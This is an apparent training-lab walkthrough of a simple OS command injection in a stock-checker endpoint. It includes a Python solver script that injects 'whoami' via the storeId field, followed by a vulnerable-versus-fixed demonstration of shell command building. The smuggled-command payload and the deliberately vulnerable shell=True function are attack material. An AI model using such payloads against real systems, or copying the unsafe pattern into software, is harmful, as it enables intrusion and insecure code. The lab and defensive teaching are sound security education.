1. OS command injection, simple case

Let's open the vulnerable lab:

Browse the application and map its requests while proxying through Burp:

The stock checker sends a POST request to /product/stock with a productId and a storeId. Let's test the parameters:

The payload contains shell metacharacters, so we URL-encode it before sending it in the request body (& becomes %26):

The command's output comes back in the response, so we have command execution.

Let's run whoami to complete the lab:

Solve it using a Python 3 script:

import os  
import sys  
  
import requests  
import urllib3  
  
# Route traffic through Burp's default listener so the requests can be inspected.  
proxies = {  
    "http": "http://127.0.0.1:8080",  
    "https": "http://127.0.0.1:8080",  
}  
  
session = requests.session()  
session.proxies.update(proxies)  
# Burp's CA is not trusted by requests; skip certificate checks for the lab only.  
session.verify = False  
urllib3.disable_warnings()  
  
  
def CommandInjection(url):  
    print("[*] Perform Command Injection.")  
    # storeId is the injection point: the first "&" ends the command the stock  
    # checker builds, "whoami" runs, and the trailing "&" detaches it from whatever  
    # the application appends. requests URL-encodes "&" as %26 in the form body.  
    data = {  
        "productId": "1",  
        "storeId": "3&whoami&",  
    }  
    response = session.post(url=url.rstrip("/") + "/product/stock", data=data)  
    print(response.text)  
  
  
if __name__ == "__main__":  
    if len(sys.argv) != 2:  
        script_name = os.path.basename(__file__)  
        print(f"[-] Usage: python {script_name} http://localhost/")  
        sys.exit(1)  
    CommandInjection(sys.argv[1])  
    print("[+] Solved.")
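To see why the storeId payload works and what the fix looks like, here is an added example (not part of the lab or of the original walkthrough). It uses a hypothetical stock checker that builds its command with `echo`, since the lab's real backend command is not shown, and runs the same `3&whoami&` payload against a vulnerable version (string concatenation plus `shell=True`), an argv-list version, and a hardened version that also rejects non-numeric IDs. Running it requires a POSIX shell with `whoami` on the PATH.

```python
import re
import subprocess

# Constructed stand-in for the lab's stock checker. The real backend command is
# not visible in the lab; "echo" is used so the effect of the payload is obvious.
COMMAND_TEMPLATE = "echo stock for product={product_id} store={store_id}"


def check_stock_vulnerable(product_id: str, store_id: str) -> str:
    """Vulnerable: user input is concatenated into a command string and handed
    to /bin/sh, so '&' in store_id ends the command and 'whoami' is executed."""
    cmd = COMMAND_TEMPLATE.format(product_id=product_id, store_id=store_id)
    proc = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return proc.stdout


def check_stock_argv(product_id: str, store_id: str) -> str:
    """Safer: the command is an argv list, no shell parses it, so '&', ';' and
    '|' are ordinary bytes inside a single argument."""
    argv = ["echo", "stock", "for", f"product={product_id}", f"store={store_id}"]
    proc = subprocess.run(argv, capture_output=True, text=True)
    return proc.stdout


def check_stock_hardened(product_id: str, store_id: str) -> str:
    """Defence in depth: allowlist the input shape as well as avoiding the shell.
    re.fullmatch with [0-9] is used instead of str.isdigit(), which also accepts
    Unicode digits such as Arabic-Indic numerals."""
    for name, value in (("productId", product_id), ("storeId", store_id)):
        if not re.fullmatch(r"[0-9]+", value):
            raise ValueError(f"{name} must be a decimal integer, got {value!r}")
    return check_stock_argv(product_id, store_id)


def injected_lines(product_id: str, store_id: str) -> list:
    """Run the vulnerable checker and return its non-empty output lines; with the
    lab payload there are two (the stock line and whoami's output), and because
    '&' backgrounds both commands their order is not guaranteed."""
    return [line for line in check_stock_vulnerable(product_id, store_id).splitlines() if line]


if __name__ == "__main__":
    payload = "3&whoami&"  # the same storeId value the lab is solved with
    print("vulnerable:", injected_lines("1", payload))
    print("argv list :", check_stock_argv("1", payload).strip())
    try:
        check_stock_hardened("1", payload)
    except ValueError as exc:
        print("hardened  :", exc)
```

The argv-list version alone already stops the injection (the payload is echoed back literally), but the allowlist is still worth having: it keeps the value from reaching any downstream component that might interpret it, and it gives a clear error instead of silently passing odd input through.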
